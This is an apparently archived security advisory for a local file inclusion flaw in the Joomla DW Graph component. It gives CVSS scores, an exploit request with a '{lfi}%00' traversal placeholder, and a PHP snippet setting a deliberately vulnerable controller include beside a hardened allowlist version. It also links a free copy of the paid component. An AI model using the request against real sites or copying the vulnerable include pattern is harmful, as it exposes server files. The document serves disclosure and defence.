Joomla Component DW Graph Local File Inclusion

2010.04.10
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

---------------------------------------------------------------------------------
Joomla Component DW Graph Local File Inclusion
---------------------------------------------------------------------------------
Author       : Chip D3 Bi0s
Group        : LatinHackTeam
Email & msn  : chipdebios@gmail.com
Date         : 31 March 2010
Critical Lvl : Moderate
Impact       : Exposure of sensitive information
Where        : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application    : DW Graph Component
Developer      : DecryptWeb
License        : GPL
type           : Commercial
Price          : $5.00
Date Added     : 25 March 2010
Download       : http://shop.decryptweb.com/extensions/joomla/graph-component.html
my gift (free) : http://rapidshare.com/files/370201416/dwgraphs_unzipfirst.zip.html
Demo           : http://demo.decryptweb.com/joomla/dwgraphs
Description    :
DW Graph Component is a Joomla 1.5 native component for displaying graphs. With this component you can input numerical values with the help of a CSV file and show a graphical representation of the input data in the site frontend. Various parameters can be configured for the display of the graph.
---------------------------------------------------------------------------
file error : /components/com_dwgraphs/dwgraphs.php
how to exploit
http://127.0.0.1/index.php?option=com_dwgraphs&controller={lfi}%00
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
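The advisory only gives the affected file and the request shape, so the following is an added illustration (not the DW Graph component's source, which is not on this page) of the Joomla 1.5 controller-dispatch pattern that produces CWE-22 bugs of this kind, beside a hardened form. Function names and the controller allowlist are assumptions; JRequest::getCmd, JError::raiseError, JPATH_COMPONENT and DS are real Joomla 1.5 APIs.

```php
<?php
defined('_JEXEC') or die('Restricted access');

// VULNERABLE pattern (hypothetical reconstruction, not the vendor's code).
// getVar() does not strip path characters, so the request value flows
// straight into the include path. "../" walks out of the controllers
// directory, and on PHP < 5.3.4 a %00 byte truncates the path so the
// ".php" suffix is never applied, which is what the advisory's
// "controller={lfi}%00" request relies on.
function dwgraphs_dispatch_vulnerable()
{
    $controller = JRequest::getVar('controller', 'default');
    require_once JPATH_COMPONENT . DS . 'controllers' . DS . $controller . '.php';
}

// HARDENED pattern: reduce the value to a command token and then accept
// only controller names the component actually ships.
function dwgraphs_dispatch_hardened()
{
    // Assumed allowlist; list the real controller files of the component.
    $allowed = array('default', 'graph');

    // getCmd() removes every character outside [A-Za-z0-9_.-], so "/",
    // "\" and NUL bytes can never reach the filesystem call.
    $controller = JRequest::getCmd('controller', 'default');

    if (!in_array($controller, $allowed, true)) {
        JError::raiseError(404, JText::_('Unknown controller'));
        return;
    }

    $path = JPATH_COMPONENT . DS . 'controllers' . DS . $controller . '.php';
    if (!file_exists($path)) {
        JError::raiseError(404, JText::_('Controller not found'));
        return;
    }
    require_once $path;
}
```

The allowlist, not the character filter, is the control to rely on: filtering alone still lets a request select any .php file inside the controllers directory.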

References:

http://www.securityfocus.com/bid/39108
http://www.exploit-db.com/exploits/11978
http://secunia.com/advisories/39200
http://packetstormsecurity.org/1003-exploits/joomladwgraph-lfi.txt
http://osvdb.org/63345


Copyright 2024, cxsecurity.com
